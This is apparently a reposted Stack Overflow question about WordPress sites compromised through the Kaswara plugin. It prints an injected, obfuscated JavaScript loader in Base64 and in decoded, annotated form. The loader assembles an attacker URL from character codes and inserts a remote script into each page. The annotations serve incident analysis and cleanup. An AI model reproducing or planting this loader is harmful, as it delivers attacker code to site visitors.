2021年5月4日星期二

KASWARA Vulnerability Hack [closed]

Thousands of WordPress sites running the Kaswara plugin were compromised; below is Base64-encoded code which, when decoded, yields the second block.

What changes to the second block of code would delete the reference to the malicious site encoded as: var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37)

PHNjcmlwdD52YXIgXzB4MjMwZD1bXCdnZXRFbGVtZW50c0J5VGFnTmFtZVwnLFwnc2NyaXB0XCcsXCdwYXJlbnROb2RlXCcsXCcyNzk4NzV2QmVFRUVcJyxcJ2hlYWRcJyxcJzY5ODQ0OHJrR2ZlRlwnLFwnNjc5NTk3cHhtU3BXXCcsXCcyODEzMTRhZVdTVlNcJyxcJzFmYXNodEdcJyxcJ2N1cnJlbnRTY3JpcHRcJyxcJzE0Mzk3ODhkeGVTbm1cJyxcJ3NyY1wnLFwnMTA1MTE5N2hKeVd6RVwnLFwnMjc3MDExdkl2aktjXCcsXCcydlJMa0xrXCcsXCdmcm9tQ2hhckNvZGVcJyxcJzFZV3dmY2pcJ107dmFyIF8weDNlNTM1Nj1fMHg1NjdiO2Z1bmN0aW9uIF8weDU2N2IoXzB4NGY2OWM2LF8weDQ0ZjA2YSl7XzB4NGY2OWM2PV8weDRmNjljNi0weDE2MTt2YXIgXzB4MjMwZDBkPV8weDIzMGRbXzB4NGY2OWM2XTtyZXR1cm4gXzB4MjMwZDBkO30oZnVuY3Rpb24oXzB4MjNjNmUzLF8weDRiODE1OSl7dmFyIF8weDEzNzIwOT1fMHg1NjdiO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4Mzg4MjkwPS1wYXJzZUludChfMHgxMzcyMDkoMHgxNjgpKSpwYXJzZUludChfMHgxMzcyMDkoMHgxNmEpKStwYXJzZUludChfMHgxMzcyMDkoMHgxNmYpKSstcGFyc2VJbnQoXzB4MTM3MjA5KDB4MTY1KSkqLXBhcnNlSW50KF8weDEzNzIwOSgweDE2MSkpKy1wYXJzZUludChfMHgxMzcyMDkoMHgxNmMpKStwYXJzZUludChfMHgxMzcyMDkoMHgxNjcpKStwYXJzZUludChfMHgxMzcyMDkoMHgxNmUpKSstcGFyc2VJbnQoXzB4MTM3MjA5KDB4MTcwKSkqLXBhcnNlSW50KF8weDEzNzIwOSgweDE2OSkpO2lmKF8weDM4ODI5MD09PV8weDRiODE1OSlicmVhaztlbHNlIF8weDIzYzZlM1tcJ3B1c2hcJ10oXzB4MjNjNmUzW1wnc2hpZnRcJ10oKSk7fWNhdGNoKF8weDIyN2FkYSl7XzB4MjNjNmUzW1wncHVzaFwnXShfMHgyM2M2ZTNbXCdzaGlmdFwnXSgpKTt9fX0oXzB4MjMwZCwweGI3MGNlKSk7dmFyIG1tPVN0cmluZ1tfMHgzZTUzNTYoMHgxNzEpXSgweDY4LDB4NzQsMHg3NCwweDcwLDB4NzMsMHgzYSwweDJmLDB4MmYsMHg3MywweDc0LDB4NjksMHg2MywweDZiLDB4MmUsMHg3NCwweDcyLDB4NjEsMHg3NiwweDY1LDB4NmMsMHg2OSwweDZlLDB4NzMsMHg2YiwweDc5LDB4NjQsMHg3MiwweDY1LDB4NjEsMHg2ZCwweDJlLDB4NjcsMHg2MSwweDJmLDB4NjIsMHg3MiwweDYxLDB4NmUsMHg2NCwweDJlLDB4NmEsMHg3MywweDI2LDB4NzYsMHgzZCwweDMwLDB4MzAsMHgzMywweDMyLDB4MjYsMHg3MywweDY5LDB4NjQsMHgzZCwweDMyLDB4MzMsMHgzNiwweDI2LDB4NzAsMHg2OSwweDY0LDB4M2QsMHgzNSwweDM0LDB4MzUsMHgzNywweDM0LDB4MzcpLGQ9ZG9jdW1lbnQscz1kW1wnY3JlYXRlRWxlbWVudFwnXShfMHgzZTUzNTYoMHgxNjMpKTtzW18weDNlNTM1NigweDE2ZCldPW1tO2RvY3VtZW50W18weDNlNTM1NigweDE2YildP2RvY3VtZW50W18weDNlNTM1NigweDE2YildW18weDNlNTM1NigweDE2NCldW1wnaW5zZXJ0QmVmb3JlXCddKHMsZG9jdW1lbnRbXzB4M2U1MzU2
KDB4MTZiKV0pOmRbXzB4M2U1MzU2KDB4MTYyKV0oXzB4M2U1MzU2KDB4MTY2KSlbMHgwXVtcJ2FwcGVuZENoaWxkXCddKHMpOzwvc2NyaXB0Pg==

The above text decodes to

<script>
// Injected loader found on sites hit through the Kaswara plugin. Obfuscation
// scheme: a string table `_0x230d` that the IIFE below rotates until a checksum
// matches, after which every property name is fetched through `_0x567b(index)`.
// As shown, the `\'` sequences would be a syntax error in JavaScript; presumably
// an escaping artifact of how the blob was stored and extracted (the Base64
// above decodes with the same backslashes) — confirm against the live file.
// Remediation note: the question asks how to edit out the URL, but the whole
// <script> block is attacker-added, so the fix is to delete the block and
// re-scan rather than patch it; the plugin hole it came in through is unchanged.
var _0x230d=[\'getElementsByTagName\',\'script\',\'parentNode\',\'279875vBeEEE\',\'head\',\'698448rkGfeF\',\'679597pxmSpW\',\'281314aeWSVS\',\'1fashtG\',\'currentScript\',\'1439788dxeSnm\',\'src\',\'1051197hJyWzE\',\'277011vIvjKc\',\'2vRLkLk\',\'fromCharCode\',\'1YWwfcj\'];
// Alias: every lookup in the payload goes through this name.
var _0x3e5356=_0x567b;
// Table lookup. Indices are offset by 0x161, so _0x567b(0x161) is element 0.
// The second parameter is never used.
function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}
// Self-check rotation (`!![]` is just `true`): keeps moving the first table
// entry to the end (shift then push) until an arithmetic combination of
// parseInt over the numeric-prefixed entries ("279875vBeEEE", ...) equals
// 0xb70ce. Only in that rotation do the indices used below name the right
// strings; on an exception it rotates once more and retries.
(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3[\'push\'](_0x23c6e3[\'shift\']());}catch(_0x227ada){_0x23c6e3[\'push\'](_0x23c6e3[\'shift\']());}}}(_0x230d,0xb70ce));
// After the rotation the lookups resolve as: 0x171 -> fromCharCode,
// 0x163 -> script, 0x16d -> src, 0x16b -> currentScript, 0x164 -> parentNode,
// 0x162 -> getElementsByTagName, 0x166 -> head (consistent with how each value
// is used below).
// Payload URL, built byte by byte with String.fromCharCode so no plain-text
// hostname appears in the file. Decoded (defanged):
//   hxxps://stick[.]travelinskydream[.]ga/brand.js&v=0032&sid=236&pid=545747
// (the question text names the host as `went.`; these bytes decode to `stick.`).
var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d[\'createElement\'](_0x3e5356(0x163));
// s.src = mm
s[_0x3e5356(0x16d)]=mm;
// Injection: insert the new <script src=mm> immediately before the currently
// running script tag; if document.currentScript is unavailable, append it to
// the first <head> element instead.
document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][\'insertBefore\'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][\'appendChild\'](s);
</script>

What changes to the JavaScript would functionally remove the MALICIOUS LINK?

went.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747

The Kaswara breach is now known, and editing the script would only be a temporary fix.

https://stackoverflow.com/questions/67394077/kaswara-vulnerability-hack May 05, 2021 at 09:28AM
